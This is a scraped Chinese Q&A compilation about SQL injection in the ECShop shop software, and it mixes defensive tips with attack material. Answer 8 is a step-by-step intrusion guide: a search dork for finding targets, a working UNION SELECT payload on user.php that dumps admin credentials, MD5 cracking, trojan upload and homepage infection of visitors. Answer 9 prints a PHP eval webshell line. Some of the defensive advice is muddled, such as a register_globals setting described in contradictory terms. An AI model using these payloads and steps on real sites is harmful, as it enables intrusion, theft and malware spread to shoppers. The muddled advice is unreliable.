當前位置:首頁 » 編程語言 » ecshopsql注入

ecshopsql注入

發布時間: 2022-08-31 09:31:20

1. ecshop sql注入漏洞要緊嗎

最好修復一下

2. ECSHOP商城系統過濾不嚴導致SQL注入漏洞,官方不知道嗎

要防止SQL注入其實不難,你知道原理就可以了。 所有的SQL注入都是從用戶的輸入開始的。如果你對所有用戶輸入進行了判定和過濾,就可以防止SQL注入了。用戶輸入有好幾種,我就說說常見的吧。 文本框、地址欄里***.asp?中?號後面的id=1之類的、單選框等等。一般SQL注入都用地址欄里的。。。。如果要說怎麼注入我想我就和上面的這位「仁兄」一樣的了。 你只要知道解決對嗎? 對於所有從上一頁傳遞過來的參數,包括request.form 、request.qurrystring等等進行過濾和修改。如最常的***.asp?id=123 ,我們的ID只是用來對應從select 里的ID,而這ID一般對應的是一個數據項的唯一值,而且是數字型的。這樣,我們只需把ID的值進行判定,就可以了。vbs默認的isnumeric是不行的,自己寫一個is_numeric更好,對傳過來的參數進行判定,OK,搞定。演算法上的話,自己想想,很容易了。但是真正要做到完美的話,還有很多要計算的。比如傳遞過來的參數的長度,類型等等,都要進行判定。還有一種網上常見的判定,就是判定傳遞參數的那一頁(即上一頁),如果是正常頁面傳弟過來就通過,否則反之。也有對' or 等等進行過濾的,自己衡量就可以了。注意一點就是了,不能用上一頁的某一個不可見request.form("*")進行判定,因為用戶完全可以用模擬的形式「復制」一個和上一頁完全一樣的頁面來遞交參數。

3. ecshop等開源程序能sql注入嗎

它能夠輕易的繞過防火牆直接訪問資料庫,甚至能夠獲得資料庫所在的伺服器的系統許可權。
在Web應用漏洞中,SQL Injection 漏洞的風險要高過其他所有的漏洞。

4. 怎麼檢測網站存在注入漏洞 防注入有哪些解決辦法

許多網站程序在編寫時,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼(一般是在瀏覽器地址欄進行,通過正常的www埠訪問),根據程序返回的結果,獲得某些想得知的數據,這就是所謂的SQL Injection,即SQL注入。

第一步:很多新手從網上下載SQL通用防注入系統的程序,在需要防範注入的頁面頭部用來防止別人進行手動注入測試。

可是如果通過SQL注入分析器就可輕松跳過防注入系統並自動分析其注入點。然後只需要幾分鍾,你的管理員賬號及密碼就會被分析出來。

第二步:對於注入分析器的防範,通過實驗,發現了一種簡單有效的防範方法。首先我們要知道SQL注入分析器是如何工作的。在操作過程中,發現軟體並不是沖著「admin」管理員賬號去的,而是沖著許可權(如flag=1)去的。這樣一來,無論你的管理員賬號怎麼變都無法逃過檢測。

第三步:既然無法逃過檢測,那我們就做兩個賬號,一個是普通的管理員賬號,一個是防止注入的賬號,如果找一個許可權最大的賬號製造假象,吸引軟體的檢測,而這個賬號里的內容是大於千字以上的中文字元,就會迫使軟體對這個賬號進行分析的時候進入全負荷狀態甚至資源耗盡而死機。下面我們就來修改資料庫吧。

  1. 對表結構進行修改。將管理員的賬號欄位的數據類型進行修改,文本型改成最大欄位255(其實也夠了,如果還想做得再大點,可以選擇備注型),密碼的欄位也進行相同設置。

  2. 對表進行修改。設置管理員許可權的賬號放在ID1,並輸入大量中文字元(最好大於100個字)。

  3. 把真正的管理員密碼放在ID2後的任何一個位置(如放在ID549上)。

我們通過上面的三步完成了對資料庫的修改。

另外要明白您做的ID1賬號其實也是真正有許可權的賬號,現在計算機處理速度那麼快,要是遇上個一定要將它算出來的軟體,這也是不安全的。只要在管理員登錄的頁面文件中寫入字元限制就行了,就算對方使用這個有上千字元的賬號密碼也會被擋住的,而真正的密碼則可以不受限制。

希望可以幫到你,謝謝!

5. 網站如何防止sql注入攻擊的解決辦法

首先我們來了解下什麼是SQL注入,SQL注入簡單來講就是將一些非法參數插入到網站資料庫中去,執行一些sql命令,比如查詢資料庫的賬號密碼,資料庫的版本,資料庫伺服器的IP等等的一些操作,sql注入是目前網站漏洞中危害最大的一個漏洞,受攻擊的網站佔大多數都是sql注入攻擊。

sql注入攻擊用英語來講Structured Query Language,在網站的編程語言當中是一種比較另類的網站開發語言,我們網站安全行業通常來講sql是用來資料庫查詢的一種網站開發語言,同時也是一種腳本文件的一個文件名,通俗來講sql就是用來對網站的資料庫進行查詢,以及增加,寫入,更新資料庫的一個sql資料庫操作。

關於資料庫我們分為2種資料庫,一種是關系資料庫,非關系資料庫,那麼目前網站使用的都是關系資料庫,關系資料庫分為sql資料庫,microsoft sql server資料庫,ACC資料庫,mysql資料庫,oracle資料庫,DB2資料庫,postgresql資料庫等等的關系資料庫,非關系資料庫分為nosql資料庫,可以存儲很大數據,針對於一些並發較高,存儲較多,雲計算的場景,頻繁讀取寫入的資料庫,像memcachedb,redis,mongodb等等非關系資料庫。

那麼什麼是sql注入呢? 簡單來講就是對網站強行進行插入數據,執行sql惡意語句對網站進行攻擊,對網站進行sql注入嘗試,可以獲取一些私密的信息,像資料庫的版本,管理員的賬號密碼等等。

關於如何防止sql注入攻擊,我們從以下幾點開始入手

首先我們可以了解到sql注入攻擊都是通過拼接的方式,把一些惡意的參數拼接到一起,然後在網站的前端中插入,並執行到伺服器後端到資料庫中去,通常我們在寫php網站代碼的時候會將get ID這個參數值獲取到後直接拼接到後端伺服器中去,查詢資料庫,但是如果拼接了一些惡意的非法參數,那麼久可以當做sql語句來執行,如果防止sql注入呢?

為了防止網站被sql注入攻擊,我們應該從一開始寫代碼的時候就應該過濾一些sql注入的非法參數,將查詢的一些sql語句,以及用戶輸入的參數值都以字元串的方式來處理,不論用戶輸入的什麼東西,在sql查詢的時候只是一段字元串,這樣構造的任何惡意參數都會以字元串的方式去查詢資料庫,一直惡意的sql注入攻擊就不會被執行,sql注入語句也就沒有效果了,再一個就是網站里的任何一個可以寫入的地方盡可能的嚴格過濾與限制,漏下一個可以輸入的地方網站就會被攻擊,網站就會被黑,所有做的網站安全就會沒有效果,包括一些get,post,cookie方式的提交都是不可信的,像數據表裡referer user-agent等欄位都是可以偽造,寫入sql注入語句的,像前端時間爆發的ecshop漏洞利用的就是user.php,偽造referer參數進行了sql注入,執行了遠程代碼。

再一個防止sql注入的方法就是開啟PHP的魔術配置,開啟安全配置模式,將safe_mode開啟on.以及關閉全局變數模式,register_globals參數設置為on,magic_quotes_gpc參數開啟,防止sql注入.如果對網站防止sql注入不懂的話,也可以找專業的網站安全公司來做安全,防止sql注入。

6. php sql注入 ecshop怎麼繞過後台登錄

可以用JS實現跳轉,代碼如下:echo "<script language=javascript>alert('刪除成功!');history.back();</script>";,

這樣如果樓主還不清楚就去後盾人學習一下那邊有高清視頻教學

7. ecshop sql注入漏洞是什麼意思

注入是指SQL語句的WHERE條件部分
如:"SELECT * FROM tUSER WHERE fUSERNAME = '" & 變數 & "'"
變數裡面是一串字元串,例如輸入"王東東",那麼SQL就變成:
"SELECT * FROM tUSER WHERE fUSERNAME = '王東東'"了
但是有人輸入了這樣的字元串:"王東東' OR '1'='1",當替換變數的值後,SQL語句就變成
"SELECT * FROM tUSER WHERE fUSERNAME = '王東東' OR '1'='1'"了
於是,這條SQL語句的條件就永遠是真的了。注入成功,如果是用於密碼判斷,就通過了。

8. 木馬是怎樣攻入Ecshop商城的

Ecshop是一套網路商城建站系統,主要服務於想快捷搭建商城系統的用戶,該系統是個人建立商城的主流軟體。
在網路上,主要有兩種類型的網路購物,一類是像淘寶這樣的C2C站點,另一類是像卓越這樣的B2C站點。B2C站點除了卓越、當當等大型站點外,還有很多規模較小的B2C站點,由於這些中小型B2C站點數目較大,因此每天的成交量也非常可觀。
這些的中小型B2C站點通常沒有專業的建站團隊,站點都是站長通過現成的商城程序搭建起來的,其中Ecshop網路商城系統用得最多,因此一旦這套系統出現安全問題,將會波及網路上所有採用這套系統建立的B2C站點。
但不幸的事情還是發生了,Ecshop出現了嚴重的安全漏洞,黑客可以運用 該漏洞入侵站點,竄改商品價格,更令人擔憂的是該漏洞可以被用來掛馬,所有訪問商城的用戶都會中毒,他們的各種賬號和密碼可能被盜。此外,黑客可以修改站點的支付介面,用戶購買商品時貨款會直接打到黑客的賬戶中。
本文主角:Ecshop商城 V2.5.0
問題所在:含有SQL漏洞
主要危害:用於掛馬、入侵伺服器等
Ecshop存在SQL注入漏洞
運用 Ecshop漏洞須要用到SQL注入。由於程序員的疏忽,沒有對User.php文件中的SQL變數實行過濾,從而導致SQL注入的發生。黑客可以構造特殊的代碼,直接讀取存放在站點資料庫中的管理員賬號和密碼。
漏洞的運用 非常基本,只需在站點地址後輸入「user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*」這樣一句代碼就可以讀出站點資料庫中的管理員賬號和密碼。
掛馬流程揭秘
第一步:尋找入侵目標
在網路或谷歌中以「Powered by Ecshop v2.5.0」為關鍵字實行搜索(圖1),可以找到很多符合條件的站點,隨便挑選一個站點作為測試目標。須要留心的是,站點越小安全防護也越弱,成功率相比較較高。

第二步:獲得管理員賬號和密碼
打開測試站點,在其網址後輸入:user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*。
例如該站點網址為http://www.***.com/,則完整的漏洞運用 地址為:http://www.***.com/ user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*。
輸入完畢後回車,如果看到類似圖2的界面,則說明漏洞被運用 成功了。在返回的信息中,可以發覺很主要的內容,包括站點管理員的賬號、密碼及E-mail地址。從圖2可以找到,管理員賬號為admin,密碼為。密碼是經過MD5加密的,所以看到的是一串32位長的字元,須要對這串字元實行破解才能看到真實的密碼。

第三步:破解MD5密碼
雖然密碼經過MD5加密,但是通過破解是可以得到密碼原文的。將這段MD5值復制下來,打開MD5在線破解站點 http://www.cmd5.com/。
把這串MD5值復制到站點頁面正中間的文本框中,點擊「MD5加密或解密」按鈕,密碼原文就被破解出來了——admin1234(圖3)。當然,破解MD5值靠的是運氣,如果管理員將密碼配置得很復雜,例如「數字+字母+特殊符號」的組合,那麼就很難破解出密碼原文。

如果MD5在線破解站點無法破解出密碼原文,那麼也可以採用MD5暴力破解軟體來實行破解,當然耗費的時間會很長,在這里就不多作介紹了。
第四步:上傳木馬
既然管理員賬號和密碼都已拿到手,接下來我們就可以登錄站點的後台了。在站點網址後輸入admin並回車,將會出現站點後台登錄頁面,輸入管理員賬號admin、密碼admin1234即可登錄。
來到後台,我們可以看到Ecshop的站點後台功能是非常多的,當然這也給了我們上傳木馬的機會。點擊「系統配置 」中的「Flash播放器管理」鏈接(圖4)。打開後再點擊「添加自定義」按鈕。


這時我們會來到一個上傳圖片的頁面,在這里不僅僅可以上傳圖片,還能輕輕鬆鬆地上傳木馬!這里我們選擇一款功能強大的PHP木馬,點擊「確定」按鈕即可將木馬上傳(圖5)。

上傳成功後,進入「輪播圖片地址」,在這里我們可以看到上傳的木馬的的路徑(圖6)。

將地址復制到瀏覽器地址欄中並打開,可以在裡面任意瀏覽、修改甚至刪除站點中的文件(圖7),最後就是在站點首頁中插入掛馬代碼,當用戶瀏覽商城首頁的時候,就會激活病毒,病毒會偷偷地入侵用戶的計算機。


防備方案
要修補該漏洞,須要對User.php文件中的SQL變數實行嚴格的過濾,不允許惡意調用變數查詢資料庫。普通讀者在上網時,最好運用能攔截網頁木馬的安全輔助工具,防止網頁木馬的騷擾。

9. 怎麼去掉ecshop模板文件過濾php標簽

最好不要在模板裡面寫php。會導致sql注入,引起後台賬號泄露。
ECshop的模板是支持php代碼的,這個給一些不法分子創造了掛馬的機會,這些不法分子掛馬步驟很可能是:
1、通過ecshop的漏洞搞SQL注入,暴出管理員密碼md5值,然後通過**md5得到管理密碼。(注:防止暴出管理密碼md5值的方法是關閉display_errors,並且修改cls_mysql.php里的ErrorMsg函數,注釋掉所有錯誤輸出代碼或把錯誤寫入文件)
2、進入管理後台,通過模板管理->庫項目管理,編輯lbi文件,添加php代碼,例如<?php @eval($_POST['lx']);?>
3、到這里,就完全控制這個站了,想掛什麼馬就掛什麼馬。
可見,ECshop的模板支持php代碼這點是非常危險的,因此我們應該過濾模板里的所有php代碼。

如果實在要去掉ecshop模板文件過濾php標簽
修改 includes/cls_template.php

可以遵循以下步驟:
去掉第288-299行以下代碼:
if(preg_match_all('~(<\?(?:\w+|=)?|\?>|language\s*=\s*[\"\']?php[\"\']?)~is', $source, $sp_match))
{
$sp_match[1] = array_unique($sp_match[1]);
for ($curr_sp = 0, $for_max2 = count($sp_match[1]); $curr_sp < $for_max2; $curr_sp++)
{
$source = str_replace($sp_match[1][$curr_sp],'%%%SMARTYSP'.$curr_sp.'%%%',$source);
}
for ($curr_sp = 0, $for_max2 = count($sp_match[1]); $curr_sp < $for_max2; $curr_sp++)
{
$source= str_replace('%%%SMARTYSP'.$curr_sp.'%%%', '<?php echo \''.str_replace("'", "\'", $sp_match[1][$curr_sp]).'\'; ?>'."\n", $source);
}
}
這樣,模板里的php代碼就被保留了。

10. SQL注入高手來,或者復制ECSHOP模塊。

暈,ecshop的源碼都是開放的。。。。自己去官方下一個自己研究啊

熱點內容
如何登錄男朋友的微信密碼 發布:2025-01-16 07:41:14 瀏覽:193
寶駿解壓流程 發布:2025-01-16 07:35:35 瀏覽:1
兩匹壓縮機多少錢 發布:2025-01-16 07:29:19 瀏覽:634
個人pc搭建游戲伺服器 發布:2025-01-16 07:27:09 瀏覽:970
存儲剩餘照片 發布:2025-01-16 07:25:01 瀏覽:49
ftp解除限制上傳文件個數 發布:2025-01-16 07:16:26 瀏覽:347
梯度下降法python 發布:2025-01-16 07:10:43 瀏覽:520
載入並編譯著色器apex 發布:2025-01-16 07:00:08 瀏覽:59
方舟出售腳本 發布:2025-01-16 06:57:55 瀏覽:955
釘釘代理伺服器Ip地址和瑞口 發布:2025-01-16 06:57:05 瀏覽:698